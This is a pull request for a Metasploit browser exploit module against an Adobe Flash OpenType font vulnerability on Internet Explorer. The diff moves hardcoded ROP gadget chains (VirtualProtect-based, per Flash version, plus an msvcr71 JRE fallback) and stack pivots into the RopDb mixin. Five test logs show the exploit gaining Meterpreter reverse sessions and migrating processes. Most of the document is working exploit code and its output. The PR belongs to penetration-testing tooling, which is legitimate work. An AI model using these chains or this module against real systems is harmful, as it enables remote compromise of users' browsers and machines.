### PR TITLE
Use RopDb in adobe_flash_otf_font, also cleaner code & output

### DIFF
--- a/modules/exploits/windows/browser/adobe_flash_otf_font.rb
+++ b/modules/exploits/windows/browser/adobe_flash_otf_font.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::RopDb
 
 	def initialize(info={})
 		super(update_info(info,
@@ -46,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'Payload'        =>
 				{
-					'Space'    => 1024
+					'Space' => 1024
 				},
 			'DefaultOptions'  =>
 				{
@@ -56,49 +57,17 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Targets'        =>
 				[
 					# Tested successfully on:
+					# Flash 11.2.202.233
 					# Flash 11.3.300.268
 					# Flash 11.3.300.265
 					# Flash 11.3.300.257
 					[ 'Automatic', {} ],
-					[
-						'IE 6 on Windows XP SP3',
-						{
-							'Rop'    => nil
-						}
-					],
-					[
-						'IE 7 on Windows XP SP3',
-						{
-							'Rop'    => nil
-						}
-					],
-					[
-						'IE 8 on Windows XP SP3',
-						{
-							'Rop'  => true,
-							'ASLR' => false
-						}
-					],
-					[
-						'IE 7 on Windows Vista SP2',
-						{
-							'Rop'    => nil
-						}
-					],
-					[
-						'IE 8 on Windows 7 SP1',
-						{
-							'Rop'    => true,
-							'ASLR'   => true
-						}
-					],
-					[
-						'IE 9 on Windows 7 SP1',
-						{
-							'Rop'    => true,
-							'ASLR'   => true
-						}
-					]
+					[ 'IE 6 on Windows XP SP3',    {'Rop' => nil } ],
+					[ 'IE 7 on Windows XP SP3',    {'Rop' => nil } ],
+					[ 'IE 8 on Windows XP SP3',    {'Rop' => true, 'ASLR' => false } ],
+					[ 'IE 7 on Windows Vista SP2', {'Rop' => nil }],
+					[ 'IE 8 on Windows 7 SP1',     {'Rop' => true, 'ASLR' => true } ],
+					[ 'IE 9 on Windows 7 SP1',     {'Rop' => true, 'ASLR'   => true } ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Aug 9 2012",
@@ -110,10 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class)
 	end
 
-	def nop
-		return make_nops(4).unpack("L")[0].to_i
-	end
-
 	def get_payload(t, flash_version=nil)
 		if t['Rop'].nil?
 			p = [
@@ -123,126 +88,50 @@ class Metasploit3 < Msf::Exploit::Remote
 			].pack("V*")
 
 			p << payload.encoded
-		else
-			if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
-
-				print_status("Using Rop Chain For Flash: #{flash_version}")
-				stack_pivot = [
-					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
-					0x0c0c0c0c,
-					0x1001d891, # xchg eax, esp # ret (1e0d0008)
-				].pack("V*")
-
-				rop = [
-					0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
-					0x106e3384, # <- *&VirtualProtect()
-					0x1029de2f, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_257.ocx)
-					0x106add37, # XCHG EAX,ESI # RETN (Flash32_11_3_300_257.ocx)
-					0x1064e000, # POP EBP # RETN (Flash32_11_3_300_257.ocx)
-					0x10175c57, # ptr to 'jmp esp' (from Flash32_11_3_300_257.ocx)
-					0x106a4010, # POP EBX # RETN (Flash32_11_3_300_257.ocx)
-					0x00000201, # <- change size to mark as executable if needed (-> ebx)
-					0x104de800, # POP ECX # RETN (Flash32_11_3_300_257.ocx)
-					0x10955000, # W pointer (lpOldProtect) (-> ecx)
-					0x10649003, # POP EDI # RETN (Flash32_11_3_300_257.ocx)
-					0x10649004, # ROP NOP (-> edi)
-					0x10649987, # POP EDX # RETN (Flash32_11_3_300_257.ocx)
-					0x00000040, # newProtect (0x40) (-> edx)
-					0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx)
-					nop,        # NOPS (-> eax)
-					0x1060e809, # PUSHAD # RETN (Flash32_11_3_300_257.ocx)
-				].pack("V*")
-
-			elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
-
-				print_status("Using Rop Chain For Flash: #{flash_version}")
-				stack_pivot = [
-					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
-					0x0c0c0c0c,
-					0x1001d6d3, # xchg eax, esp # ret (1e0d0008)
-				].pack("V*")
-
-				rop = [
-					0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
-					0x106e338c, # <- *&VirtualProtect()
-					0x1029ea04, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_265.ocx)
-					0x103d60b8, # XCHG EAX,ESI # RETN (Flash32_11_3_300_265.ocx)
-					0x105cc000, # POP EBP # RETN (Flash32_11_3_300_265.ocx)
-					0x1001c5cd, # ptr to 'jmp esp' (from Flash32_11_3_300_265.ocx)
-					0x10398009, # POP EBX # RETN (Flash32_11_3_300_265.ocx)
-					0x00000201, # <- change size to mark as executable if needed (-> ebx)
-					0x10434188, # POP ECX # RETN (Flash32_11_3_300_265.ocx)
-					0x10955000, # W pointer (lpOldProtect) (-> ecx)
-					0x105c1811, # POP EDI # RETN (Flash32_11_3_300_265.ocx)
-					0x105c1812, # ROP NOP (-> edi)
-					0x10650602, # POP EDX # RETN (Flash32_11_3_300_265.ocx)
-					0x00000040, # newProtect (0x40) (-> edx)
-					0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx)
-					nop,        # NOPS (-> eax)
-					0x1062800f, # PUSHAD # RETN (Flash32_11_3_300_265.ocx)
-				].pack("V*")
-
-			elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
-
-				print_status("Using Rop Chain For Flash: #{flash_version}")
-				stack_pivot = [
-					0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
-					0x0c0c0c0c,
-					0x1001d755, # xchg eax, esp # ret (1e0d0008)
-				].pack("V*")
-				rop = [
-					0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
-					0x106e438c, # <- *&VirtualProtect()
-					0x10198e00, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_268.ocx)
-					0x106ddf15, # XCHG EAX,ESI # RETN (Flash32_11_3_300_268.ocx)
-					0x1035f000, # POP EBP # RETN (Flash32_11_3_300_268.ocx)
-					0x10175c28, # ptr to 'jmp esp' (from Flash32_11_3_300_268.ocx)
-					0x105e0013, # POP EBX # RETN (Flash32_11_3_300_268.ocx)
-					0x00000201, # <- change size to mark as executable if needed (-> ebx)
-					0x10593801, # POP ECX # RETN (Flash32_11_3_300_268.ocx)
-					0x1083c000, # RW pointer (lpOldProtect) (-> ecx)
-					0x10308b0e, # POP EDI # RETN (Flash32_11_3_300_268.ocx)
-					0x10308b0f, # ROP NOP (-> edi)
-					0x10663a00, # POP EDX # RETN (Flash32_11_3_300_268.ocx)
-					0x00000040, # newProtect (0x40) (-> edx)
-					0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx)
-					nop,        # NOPS (-> eax)
-					0x1069120b, # PUSHAD # RETN (Flash32_11_3_300_268.ocx)
-				].pack("V*")
-
-			else
-
-				print_status("Default back to JRE ROP")
-				stack_pivot = [
-					0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)
-					0x0c0c0c0c,
-					0x7c348b05, # xchg eax, esp # ret (1e0d0008)
-				].pack("V*")
-
-				rop = [
-					0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
-					0x00001000, # (dwSize)
-					0x7c347f98, # RETN (ROP NOP)
-					0x7c3415a2, # JMP [EAX]
-					0xffffffff,
-					0x7c376402, # skip 4 bytes
-					0x7c345255, # INC EBX # FPATAN # RETN
-					0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN
-					0x7c344f87, # POP EDX # RETN
-					0x00000040, # flNewProtect
-					0x7c34d201, # POP ECX # RETN
-					0x7c38b001, # &Writable location
-					0x7c347f97, # POP EAX # RETN
-					0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
-					0x7c378c81, # PUSHAD # ADD AL,0EF # RETN
-					0x7c345c30, # ptr to 'push esp #  ret '
-				].pack("V*")
-
-			end
-			p = stack_pivot
-			p << rop
-			p << payload.encoded
+			return p
 		end
+
+		if t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/
+			print_status("Using Rop Chain For Flash: #{flash_version}")
+			pivot = [
+				0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
+				0x0c0c0c0c,
+				0x1001d891, # xchg eax, esp # ret (1e0d0008)
+			].pack("V*")
+
+			p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
+
+		elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/
+			print_status("Using Rop Chain For Flash: #{flash_version}")
+			pivot = [
+				0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
+				0x0c0c0c0c,
+				0x1001d6d3, # xchg eax, esp # ret (1e0d0008)
+			].pack("V*")
+
+			p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
+
+		elsif t['ASLR'] == false and datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/
+			print_status("Using Rop Chain For Flash: #{flash_version}")
+			pivot = [
+				0x10004171, # POP EDI # POP ESI # RETN (1e0d0000)
+				0x0c0c0c0c,
+				0x1001d755, # xchg eax, esp # ret (1e0d0008)
+			].pack("V*")
+
+			p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
+
+		else
+			print_status("Default back to JRE ROP")
+			pivot = [
+				0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000)
+				0x0c0c0c0c,
+				0x7c348b05, # xchg eax, esp # ret (1e0d0008)
+			].pack("V*")
+
+			p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
+		end
+
 		return p
 	end
 
@@ -268,11 +157,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def on_request_uri(cli, request)
-
 		agent = request.headers['User-Agent']
-		print_status("User-agent: #{agent}")
 		my_target = get_target(agent)
-
+		print_status("Target selected: #{my_target.name}")
 		print_status("Client requesting: #{request.uri}")
 
 		# Avoid the attack if the victim doesn't have the same setup we're targeting


### PR DESCRIPTION
This pull request has the following changes:
- More target testing
- Use of RopDb mixin
- Cleaner code
- Cleaner output in msfconsole

Test Results:

Test #1:

```
msf  exploit(adobe_flash_otf_font) >
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /m7
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /QknEH.txt
[*] 10.0.1.6         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 3 opened (10.0.1.3:4444 -> 10.0.1.6:2469) at 2012-10-06 20:40:41 -0500
[*] Session ID 3 (10.0.1.3:4444 -> 10.0.1.6:2469) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (404)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 784
[+] Successfully migrated to process
```

Test #2:

```
msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/49
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /49
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ikGxF.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,268
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 4 opened (10.0.1.3:4444 -> 10.0.1.6:1114) at 2012-10-06 20:45:36 -0500
[*] Session ID 4 (10.0.1.3:4444 -> 10.0.1.6:1114) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3104)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3380
[+] Successfully migrated to process
```

Test #3:

```
msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/ev
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /ev
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /CzAta.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,265
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.6:1077) at 2012-10-06 20:49:56 -0500
[*] Session ID 5 (10.0.1.3:4444 -> 10.0.1.6:1077) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3464)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3824
[+] Successfully migrated to process
```

Test #4:

```
msf  exploit(adobe_flash_otf_font) >
[*]  Local IP: http://10.0.1.3:8080/Ew
[*] Server started.
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /Ew
[*] 10.0.1.6         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt.swf
[*] 10.0.1.6         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.6         adobe_flash_otf_font - Target selected: IE 8 on Windows XP SP3
[*] 10.0.1.6         adobe_flash_otf_font - Client requesting: /oemOE.txt
[*] 10.0.1.6         adobe_flash_otf_font - Using Rop Chain For Flash: 11,3,300,257
[*] 10.0.1.6         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.6
[*] Meterpreter session 6 opened (10.0.1.3:4444 -> 10.0.1.6:1260) at 2012-10-06 20:56:03 -0500
[*] Session ID 6 (10.0.1.3:4444 -> 10.0.1.6:1260) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3108)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3420
[+] Successfully migrated to process
```

Test #5:

```
msf  exploit(adobe_flash_otf_font) > [*]  Local IP: http://10.0.1.3:8080/gp
[*] Server started.
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /gp
[*] 10.0.1.7         adobe_flash_otf_font - Sending HTML
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt.swf
[*] 10.0.1.7         adobe_flash_otf_font - Sending SWF
[*] 10.0.1.7         adobe_flash_otf_font - Target selected: IE 9 on Windows 7 SP1
[*] 10.0.1.7         adobe_flash_otf_font - Client requesting: /aABPR.txt
[*] 10.0.1.7         adobe_flash_otf_font - Default back to JRE ROP
[*] 10.0.1.7         adobe_flash_otf_font - Sending Payload
[*] Sending stage (752128 bytes) to 10.0.1.7
[*] Meterpreter session 7 opened (10.0.1.3:4444 -> 10.0.1.7:49174) at 2012-10-06 21:02:57 -0500
[*] Session ID 7 (10.0.1.3:4444 -> 10.0.1.7:49174) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2752)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3048
[+] Successfully migrated to process
```
